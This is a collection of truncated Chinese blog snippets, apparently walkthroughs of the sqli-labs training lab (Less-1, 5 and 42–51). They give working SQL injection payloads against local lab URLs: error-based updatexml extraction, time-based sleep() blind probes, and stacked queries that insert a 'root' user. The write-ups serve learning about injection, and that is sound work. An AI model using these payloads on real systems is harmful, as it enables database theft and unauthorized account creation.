Less-5: 核心语句: 我们注意到,当输入正确时,并不能获得有价值的回显.好在出现错误时,会爆出错误内容: 于是,使用报错注入: 1'  and updatexml(1,concat(0x7e,(select(database()))),1) --+ 此时,我们的语句实际上已经变成and连接的两个命令(or也行). updatexml是一个常用的报错函数,它有三个参数,在第二个参数中本应输入一个路径.我们输入要查询的东西加一个非法字符0x7e(' ~ '),就可以通过报错获得信息.conca…

一.第一次见面 1.初识 http://localhost/Less-1/ 提示输入id,因此访问http://localhost/Less-1/?id=1 可以继续测试id=2.3.4等的情况,会输出不同的用户名和密码 2.进一步了解 每一次都会有不同的账号密码出来,当然肯定不能这样简单的访问. 既然题目说了存在单引号的错误,那就来试一下http://localhost/Less-1/?id=%27 没毛病报错了,说明单引号会被算入sql语句中 假设一下,这个sql语句是这样构造的: $sql…

less50的字符型版本,闭合好引号就行 http://192.168.136.128/sqli-labs-master/Less-51/?sort=1';insert into users(id,username,password) value (15,'root','root')%23…

报错没有关闭,直接可以用UpdateXml函数 http://192.168.136.128/sqli-labs-master/Less-50/?sort=1 and UpdateXml(1,concat(0x7e,database(),0x7e),1) 用堆叠注入 http://192.168.136.128/sqli-labs-master/Less-50/?sort=1;insert into users(id,username,password) value (15,'root','ro…

都是order by的注入,作者连图片都懒得改了... 注意和整型的区别,前引号用提交的引号闭合,后引号用#注释 http://192.168.136.128/sqli-labs-master/Less-49/?sort=1' and sleep(0.1)%23…

图片还是47...访问的的确是48 这个是基于bool的盲注 http://192.168.136.128/sqli-labs-master/Less-48/?sort=1 and sleep(0.1)…

http://192.168.136.128/sqli-labs-master/Less-47/?sort=1 改变sort的值,结果仍然是order by 1的结果 http://192.168.136.128/sqli-labs-master/Less-47/?sort=1' and sleep(0.1)%23…

http://192.168.136.128/sqli-labs-master/Less-46/?sort=1 sort=4时出现报错 说明参数是添加在order by 之后 错误信息没有屏蔽,直接使用UpdateXml函数报错 http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,database(),0x7e),1)%23 http://192.168.136.128/sqli-…

和Less44一个名字 测试一下,发现是')闭合的 login_user=&login_password=1') or sleep(0.1)# 那就是没有错误显示的less42 login_user=&login_password=1');insert into users(id,username,password) value(15,'root','root')#…

盲注漏洞,登陆失败和注入失败显示的同一个页面 可以用sleep函数通过延时判断是否闭合引号成功 这个方法有一点不好的地方在于,并不能去控制延时,延时的时间取决于users表中的数据数量和sleep函数的参数 login_user=&login_password=1' or sleep(0.1)# 14条数据延时了1.4s 但延时的出现就证明引号闭合成功了 login_user=&login_password=1';insert into users(id,username,password…